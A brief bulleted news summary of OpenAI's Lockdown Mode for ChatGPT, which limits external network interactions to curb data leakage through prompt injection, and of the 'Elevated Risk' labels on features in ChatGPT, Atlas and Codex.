- As AI increasingly connects to the web and external apps, the risk of prompt injection rises: attackers can insert malicious commands to deceive the system or steal sensitive data.
- OpenAI introduces Lockdown Mode in ChatGPT—an advanced, optional security mode for high-risk users such as executives or security teams.
- Lockdown Mode strictly limits how ChatGPT interacts with external systems to prevent data leakage via prompt injection.
- For example, when Lockdown Mode is enabled, web browsing only uses cached content and does not send direct network requests outside the OpenAI system.
- Some features are completely disabled if data safety cannot be guaranteed at a deterministic level.
- Lockdown Mode is available for ChatGPT Enterprise, Edu, Healthcare, and Teachers plans; administrators can enable it in Workspace Settings and create specific roles.
- Admins can granularly control which apps and actions are permitted in Lockdown Mode; the Compliance API Logs Platform provides monitoring of app usage and shared data.
- OpenAI plans to expand Lockdown Mode to individual users in the coming months.
- Simultaneously, the company is standardizing the “Elevated Risk” label for certain features that may pose cyber risks in ChatGPT, ChatGPT Atlas, and Codex.
- For instance, in Codex, when granting an agent internet access, the system displays an Elevated Risk warning, explaining security changes and potential hazards.
- Once security measures are sufficiently robust, OpenAI will remove the Elevated Risk label from the corresponding features.
📌 Conclusion: OpenAI adds Lockdown Mode to limit network interactions and prevent data leakage via prompt injection, specifically for enterprises and high-risk groups. Meanwhile, the Elevated Risk label helps users identify features with security risks when connecting to the web or apps. This is a step toward enhancing transparency and control as AI becomes more integrated with infrastructure and sensitive data.
